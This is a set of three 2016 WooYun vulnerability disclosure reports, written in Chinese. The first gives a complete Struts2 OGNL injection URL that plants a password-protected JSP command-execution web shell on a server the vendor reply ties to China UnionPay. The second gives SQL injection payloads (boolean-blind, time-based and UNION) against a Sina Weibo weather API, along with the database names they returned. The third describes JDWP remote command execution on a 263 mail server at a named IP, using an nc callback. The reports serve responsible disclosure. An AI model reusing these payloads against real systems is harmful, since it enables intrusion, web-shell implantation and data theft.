漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：不多说了，赶快上车详细说明：这个系统之前就有漏洞 http://**.**.**.**/bugs/wooyun-2016-0170697据说很多敏感数据啊code 区域http://**.**.**.**:8091/logout.action?method:[email protected]/* */@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%**.**.**.**.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%**.**.**.**.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.read%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E最新的st2命令执行漏洞证明：借tangscan的工具验证了一下也没问题 修复方案：升级版权声明：转载请注明来源 举起手来@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-04-29 18:33厂商回复：CNVD确认并复现所述情况，已经转由CNCERT发给中国银联，由其后续协调网站管理单位处置。最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：新浪微博某站MySQL注射（支持三种查询方式）详细说明： code 区域GET /api.php?idfa=xxxx&lang=zh-Hans-CN&limit=20&pv=3.929&ts=1461744953.516815&sv=9.310&device_id=xx&method=comments.get&resolution=1242%2A2208&conn=1&tqt_userid=88511248&sign=xx&uid=xxx&carrier=1&timezone=GMT%2B8&pid=free&citycode=CHXX0016&api_key=517276d5c1d3c&pt=3010&device=iPhone&pd=tq HTTP/1.1 Host: tqt.weibo.cn Accept-Language: zh-Hans, en-us User-Agent: Connection: close Accept-Encoding: gzip, deflate打了xxx都是我的敏感信息code 区域注入参数#citycode 漏洞证明： code 区域布尔盲注:' AND 6109=6109 AND 'eHNv'='eHNy 延迟注入:' AND (SELECT * FROM (SELECT(SLEEP(5)))AVuk) AND 'zYAE'='zYAE 联合查询:' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6b71,0x6e5a67744172494e4e6342744c70784a716e674855,NULL,NULL,NULL,CONCAT(0x716a6b6b71,0x6e5a67744172494e4e6342744c70784a716e674855code 区域available databases [3]: [*] information_schema [*] test [*] tianqitongcode 区域当前数据库：tianqitongcode 区域当前数据库用户：'[email protected]/* */%' 修复方案：过滤版权声明：转载请注明来源 Aasron@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-04-29 18:51厂商回复：感谢关注新浪安全，问题修复中。最新状态：暂无

漏洞详情披露状态： 2016-04-28： 细节已通知厂商并且等待厂商处理中2016-04-28： 厂商已经确认，细节仅向厂商公开2016-05-08： 细节向核心白帽子及相关领域专家公开2016-05-18： 细节向普通白帽子公开2016-05-28： 细节向实习白帽子公开2016-06-12： 细节向公众公开简要描述：263某邮件系统远程命令执行详细说明：http://211.150.64.68/263的一个邮箱系统，8000端口默认开启了jdwp服务，造成远程命令执行参考 WooYun: 某动漫网任意命令执行导致18w用户数据泄漏(jdwp利用实例) 利用程序 https://github.com/IOActive/jdwp-shellifier漏洞证明：找个服务器nc监听端口，执行Telnet命令连过来，仅作验证，未反弹shell 修复方案：关闭服务版权声明：转载请注明来源 greg.wu@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-04-28 15:10厂商回复：谢谢最新状态：暂无